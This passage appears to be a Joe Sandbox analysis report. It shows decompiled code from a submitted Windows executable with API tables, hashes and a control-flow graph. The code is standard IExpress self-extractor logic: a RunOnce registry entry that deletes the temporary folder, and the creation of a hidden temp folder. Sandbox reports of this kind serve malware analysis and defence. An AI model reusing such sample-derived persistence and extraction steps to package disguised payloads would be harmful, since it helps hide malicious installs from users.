                                                                                                                                                                                                                                              					_t87 = _t87 + 1;
                                                                                                                                                                                                                                              					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                              					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                              					_t79 = _t84;
                                                                                                                                                                                                                                              					E0097658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                              					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                              					_t84 = _t46;
                                                                                                                                                                                                                                              					if(_t84 == 0) {
                                                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x979a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              							L17:
                                                                                                                                                                                                                                              							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							_pop(_t86);
                                                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						_t72 =  &_v268;
                                                                                                                                                                                                                                              						_t80 = _t72 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t49 =  *_t72;
                                                                                                                                                                                                                                              							_t72 = _t72 + 1;
                                                                                                                                                                                                                                              						} while (_t49 != 0);
                                                                                                                                                                                                                                              						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                              						_t81 = 0x9791e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t50 =  *_t81;
                                                                                                                                                                                                                                              							_t81 = _t81 + 1;
                                                                                                                                                                                                                                              						} while (_t50 != 0);
                                                                                                                                                                                                                                              						_t84 = _t73 + 0x50 + _t81 - 0x9791e5;
                                                                                                                                                                                                                                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x9791e5);
                                                                                                                                                                                                                                              						if(_t90 != 0) {
                                                                                                                                                                                                                                              							 *0x978580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              							E0097171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                              							_t75 = _t90;
                                                                                                                                                                                                                                              							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                              							_t79 = _t23;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t56 =  *_t75;
                                                                                                                                                                                                                                              								_t75 = _t75 + 1;
                                                                                                                                                                                                                                              							} while (_t56 != 0);
                                                                                                                                                                                                                                              							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                              							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                              							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                              							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t79 = 0x4b5;
                                                                                                                                                                                                                                              						E009744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                              					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                              					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                              					if(_t91 == 0) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              						E0097658A( &_v268, 0x104, 0x971140);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              				 *0x978530 = _t66;
                                                                                                                                                                                                                                              				goto L23;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x0097202a
                                                                                                                                                                                                                                              0x00972035
                                                                                                                                                                                                                                              0x0097203c
                                                                                                                                                                                                                                              0x00972041
                                                                                                                                                                                                                                              0x00972050
                                                                                                                                                                                                                                              0x0097205f
                                                                                                                                                                                                                                              0x00972064
                                                                                                                                                                                                                                              0x0097206f
                                                                                                                                                                                                                                              0x0097208c
                                                                                                                                                                                                                                              0x00972094
                                                                                                                                                                                                                                              0x00972257
                                                                                                                                                                                                                                              0x00972266
                                                                                                                                                                                                                                              0x00972266
                                                                                                                                                                                                                                              0x0097209a
                                                                                                                                                                                                                                              0x0097209b
                                                                                                                                                                                                                                              0x0097209d
                                                                                                                                                                                                                                              0x009720aa
                                                                                                                                                                                                                                              0x009720af
                                                                                                                                                                                                                                              0x009720c9
                                                                                                                                                                                                                                              0x009720d1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009720d3
                                                                                                                                                                                                                                              0x009720da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009720da
                                                                                                                                                                                                                                              0x009720e2
                                                                                                                                                                                                                                              0x00972103
                                                                                                                                                                                                                                              0x0097210e
                                                                                                                                                                                                                                              0x00972116
                                                                                                                                                                                                                                              0x00972122
                                                                                                                                                                                                                                              0x00972128
                                                                                                                                                                                                                                              0x0097212c
                                                                                                                                                                                                                                              0x00972179
                                                                                                                                                                                                                                              0x00972194
                                                                                                                                                                                                                                              0x009721de
                                                                                                                                                                                                                                              0x009721e4
                                                                                                                                                                                                                                              0x00972256
                                                                                                                                                                                                                                              0x00972256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972256
                                                                                                                                                                                                                                              0x00972196
                                                                                                                                                                                                                                              0x00972196
                                                                                                                                                                                                                                              0x0097219c
                                                                                                                                                                                                                                              0x0097219f
                                                                                                                                                                                                                                              0x0097219f
                                                                                                                                                                                                                                              0x009721a1
                                                                                                                                                                                                                                              0x009721a2
                                                                                                                                                                                                                                              0x009721a6
                                                                                                                                                                                                                                              0x009721a8
                                                                                                                                                                                                                                              0x009721b0
                                                                                                                                                                                                                                              0x009721b0
                                                                                                                                                                                                                                              0x009721b2
                                                                                                                                                                                                                                              0x009721b3
                                                                                                                                                                                                                                              0x009721bc
                                                                                                                                                                                                                                              0x009721c7
                                                                                                                                                                                                                                              0x009721cb
                                                                                                                                                                                                                                              0x009721f1
                                                                                                                                                                                                                                              0x009721f6
                                                                                                                                                                                                                                              0x009721fd
                                                                                                                                                                                                                                              0x009721ff
                                                                                                                                                                                                                                              0x009721ff
                                                                                                                                                                                                                                              0x00972204
                                                                                                                                                                                                                                              0x00972213
                                                                                                                                                                                                                                              0x00972218
                                                                                                                                                                                                                                              0x0097221d
                                                                                                                                                                                                                                              0x0097221d
                                                                                                                                                                                                                                              0x00972220
                                                                                                                                                                                                                                              0x00972220
                                                                                                                                                                                                                                              0x00972222
                                                                                                                                                                                                                                              0x00972223
                                                                                                                                                                                                                                              0x00972229
                                                                                                                                                                                                                                              0x0097223d
                                                                                                                                                                                                                                              0x00972249
                                                                                                                                                                                                                                              0x00972250
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972250
                                                                                                                                                                                                                                              0x009721d2
                                                                                                                                                                                                                                              0x009721d9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009721d9
                                                                                                                                                                                                                                              0x0097213a
                                                                                                                                                                                                                                              0x00972141
                                                                                                                                                                                                                                              0x00972144
                                                                                                                                                                                                                                              0x0097214c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972163
                                                                                                                                                                                                                                              0x00972172
                                                                                                                                                                                                                                              0x00972172
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972163
                                                                                                                                                                                                                                              0x009720ea
                                                                                                                                                                                                                                              0x009720f0
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972050
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0097205F
                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0097208C
                                                                                                                                                                                                                                                • Part of subcall function 0097171E: _vsnprintf.MSVCRT ref: 00971750
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009720C9
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009720EA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00972103
                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972122
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00972134
                                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972144
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 0097215B
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0097218C
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009721C1
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009721E4
                                                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0097223D
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972249
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972250
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                              • API String ID: 178549006-3726664654
                                                                                                                                                                                                                                              • Opcode ID: e7d9d74723e4e9f5f5883c60892e3b05e1946b0257b56abf81311722af67d02a
                                                                                                                                                                                                                                              • Instruction ID: bfd36da9921cc9abd886a6eb51d04763a106f72dace3d7abc9443eaecf22060b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7d9d74723e4e9f5f5883c60892e3b05e1946b0257b56abf81311722af67d02a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0510673A68214ABDB249B64DC4DFEB776CFBC1700F0081A8FA4DE6151DA709E85DB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 232 9755a0-9755d9 call 97468f LocalAlloc 235 9755fd-97560c call 97468f 232->235 236 9755db-9755f1 call 9744b9 call 976285 232->236 241 975632-975643 lstrcmpA 235->241 242 97560e-975630 call 9744b9 LocalFree 235->242 248 9755f6-9755f8 236->248 245 975645 241->245 246 97564b-975659 LocalFree 241->246 242->248 245->246 250 975696-97569c 246->250 251 97565b-97565d 246->251 252 9758b7-9758c7 call 976ce0 248->252 253 9756a2-9756a8 250->253 254 97589f-9758b5 call 976517 250->254 255 97565f-975667 251->255 256 975669 251->256 253->254 259 9756ae-9756c1 GetTempPathA 253->259 254->252 255->256 260 97566b-97567a call 975467 255->260 256->260 263 9756f3-975711 call 971781 259->263 264 9756c3-9756c9 call 975467 259->264 269 975680-975691 call 9744b9 260->269 270 97589b-97589d 260->270 274 975717-975729 GetDriveTypeA 263->274 275 97586c-975890 GetWindowsDirectoryA call 97597d 263->275 272 9756ce-9756d0 264->272 269->248 270->252 272->270 276 9756d6-9756df call 972630 272->276 278 975730-975740 GetFileAttributesA 274->278 279 97572b-97572e 274->279 275->263 288 975896 275->288 276->263 289 9756e1-9756ed call 975467 276->289 282 975742-975745 278->282 283 97577e-97578f call 97597d 278->283 279->278 279->282 286 975747-97574f 282->286 287 97576b 282->287 295 9757b2-9757bf call 972630 283->295 296 975791-97579e call 972630 283->296 292 975771-975779 286->292 293 975751-975753 286->293 287->292 288->270 289->263 289->270 298 975864-975866 292->298 293->292 297 975755-975762 call 976952 293->297 307 9757d3-9757f8 call 97658a GetFileAttributesA 295->307 308 9757c1-9757cd GetWindowsDirectoryA 295->308 296->287 306 9757a0-9757b0 call 97597d 296->306 297->287 309 975764-975769 297->309 298->274 298->275 306->287 306->295 314 97580a 307->314 315 9757fa-975808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 97580d-97580f 314->316 315->316 317 975827-97585c SetFileAttributesA call 971781 call 975467 316->317 318 975811-975825 316->318 317->270 323 97585e 317->323 318->298 323->298
                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E009755A0(void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v265;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				int _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t35;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                                                                              				long _t48;
                                                                                                                                                                                                                                              				int _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				char _t60;
                                                                                                                                                                                                                                              				int _t65;
                                                                                                                                                                                                                                              				char _t66;
                                                                                                                                                                                                                                              				int _t67;
                                                                                                                                                                                                                                              				int _t68;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				int _t70;
                                                                                                                                                                                                                                              				int _t71;
                                                                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                              				int _t73;
                                                                                                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                                                                                                              				CHAR* _t88;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                              				_t2 = E0097468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                              				if(_t109 != 0) {
                                                                                                                                                                                                                                              					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                              					_t32 = E0097468F(_t82, _t109, 1);
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                              						__eflags = _t33;
                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                              							 *0x979a30 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						_t35 =  *0x978b3e; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t35;
                                                                                                                                                                                                                                              						if(_t35 == 0) {
                                                                                                                                                                                                                                              							__eflags =  *0x978a24; // 0x0
                                                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                                                              								L46:
                                                                                                                                                                                                                                              								_t101 = 0x7d2;
                                                                                                                                                                                                                                              								_t36 = E00976517(_t82, 0x7d2, 0, E00973210, 0, 0);
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0x979a30; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t109 = 0x9791e4;
                                                                                                                                                                                                                                              									_t40 = GetTempPathA(0x104, 0x9791e4);
                                                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                                                              										L19:
                                                                                                                                                                                                                                              										_push(_t82);
                                                                                                                                                                                                                                              										E00971781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                              										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                              										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                              											do {
                                                                                                                                                                                                                                              												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                              												__eflags = _t109 - 6;
                                                                                                                                                                                                                                              												if(_t109 == 6) {
                                                                                                                                                                                                                                              													L22:
                                                                                                                                                                                                                                              													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                              													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L23;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													__eflags = _t109 - 3;
                                                                                                                                                                                                                                              													if(_t109 != 3) {
                                                                                                                                                                                                                                              														L23:
                                                                                                                                                                                                                                              														__eflags = _t109 - 2;
                                                                                                                                                                                                                                              														if(_t109 != 2) {
                                                                                                                                                                                                                                              															L28:
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															goto L29;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                              															if(_t66 == 0x41) {
                                                                                                                                                                                                                                              																L29:
                                                                                                                                                                                                                                              																_t60 = _t66 + 1;
                                                                                                                                                                                                                                              																_v268 = _t60;
                                                                                                                                                                                                                                              																goto L42;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                              																if(_t66 == 0x42) {
                                                                                                                                                                                                                                              																	goto L29;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t68 = E00976952( &_v268);
                                                                                                                                                                                                                                              																	__eflags = _t68;
                                                                                                                                                                                                                                              																	if(_t68 == 0) {
                                                                                                                                                                                                                                              																		goto L28;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                              																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                              																			L30:
                                                                                                                                                                                                                                              																			_push(0);
                                                                                                                                                                                                                                              																			_t103 = 3;
                                                                                                                                                                                                                                              																			_t49 = E0097597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                              																			__eflags = _t49;
                                                                                                                                                                                                                                              																			if(_t49 != 0) {
                                                                                                                                                                                                                                              																				L33:
                                                                                                                                                                                                                                              																				_t50 = E00972630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t50;
                                                                                                                                                                                                                                              																				if(_t50 != 0) {
                                                                                                                                                                                                                                              																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t88 =  &_v268;
                                                                                                                                                                                                                                              																				E0097658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                              																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                              																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                              																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                              																					__eflags = _t54;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				__eflags = _t54;
                                                                                                                                                                                                                                              																				if(_t54 != 0) {
                                                                                                                                                                                                                                              																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                              																					_push(_t88);
                                                                                                                                                                                                                                              																					_t109 = 0x9791e4;
                                                                                                                                                                                                                                              																					E00971781(0x9791e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                              																					_t101 = 1;
                                                                                                                                                                                                                                              																					_t59 = E00975467(0x9791e4, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t59;
                                                                                                                                                                                                                                              																					if(_t59 != 0) {
                                                                                                                                                                                                                                              																						goto L45;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t60 = _v268;
                                                                                                                                                                                                                                              																						goto L42;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                              																					_v265 = 0;
                                                                                                                                                                                                                                              																					_v268 = _t60;
                                                                                                                                                                                                                                              																					goto L42;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				_t65 = E00972630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t65;
                                                                                                                                                                                                                                              																				if(_t65 != 0) {
                                                                                                                                                                                                                                              																					goto L28;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t67 = E0097597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t67;
                                                                                                                                                                                                                                              																					if(_t67 == 0) {
                                                                                                                                                                                                                                              																						goto L28;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						goto L33;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			goto L28;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L22;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L47;
                                                                                                                                                                                                                                              												L42:
                                                                                                                                                                                                                                              												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                              											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										goto L43;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t101 = 1;
                                                                                                                                                                                                                                              										_t69 = E00975467(0x9791e4, 1, 3); // executed
                                                                                                                                                                                                                                              										__eflags = _t69;
                                                                                                                                                                                                                                              										if(_t69 != 0) {
                                                                                                                                                                                                                                              											goto L45;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t82 = 0x9791e4;
                                                                                                                                                                                                                                              											_t70 = E00972630(0, 0x9791e4, 1);
                                                                                                                                                                                                                                              											__eflags = _t70;
                                                                                                                                                                                                                                              											if(_t70 != 0) {
                                                                                                                                                                                                                                              												goto L19;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t101 = 1;
                                                                                                                                                                                                                                              												_t82 = 0x9791e4;
                                                                                                                                                                                                                                              												_t71 = E00975467(0x9791e4, 1, 1);
                                                                                                                                                                                                                                              												__eflags = _t71;
                                                                                                                                                                                                                                              												if(_t71 != 0) {
                                                                                                                                                                                                                                              													goto L45;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													do {
                                                                                                                                                                                                                                              														goto L19;
                                                                                                                                                                                                                                              														L43:
                                                                                                                                                                                                                                              														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              														_push(4);
                                                                                                                                                                                                                                              														_t101 = 3;
                                                                                                                                                                                                                                              														_t82 =  &_v268;
                                                                                                                                                                                                                                              														_t44 = E0097597D(_t82, _t101, 1);
                                                                                                                                                                                                                                              														__eflags = _t44;
                                                                                                                                                                                                                                              													} while (_t44 != 0);
                                                                                                                                                                                                                                              													goto L2;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                              							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								_t72 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0x978b3f - _t35; // 0x0
                                                                                                                                                                                                                                              								_t72 = 0;
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L10;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t101 = 0;
                                                                                                                                                                                                                                              							_t73 = E00975467(0x978b3e, 0, _t72);
                                                                                                                                                                                                                                              							__eflags = _t73;
                                                                                                                                                                                                                                              							if(_t73 != 0) {
                                                                                                                                                                                                                                              								L45:
                                                                                                                                                                                                                                              								_t38 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t101 = 0x4be;
                                                                                                                                                                                                                                              								E009744B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L2;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t101 = 0x4b1;
                                                                                                                                                                                                                                              						E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              						goto L2;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t101 = 0x4b5;
                                                                                                                                                                                                                                              					E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					_t38 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L47:
                                                                                                                                                                                                                                              				return E00976CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x009755ab
                                                                                                                                                                                                                                              0x009755b2
                                                                                                                                                                                                                                              0x009755c9
                                                                                                                                                                                                                                              0x009755d5
                                                                                                                                                                                                                                              0x009755d9
                                                                                                                                                                                                                                              0x00975600
                                                                                                                                                                                                                                              0x00975605
                                                                                                                                                                                                                                              0x0097560a
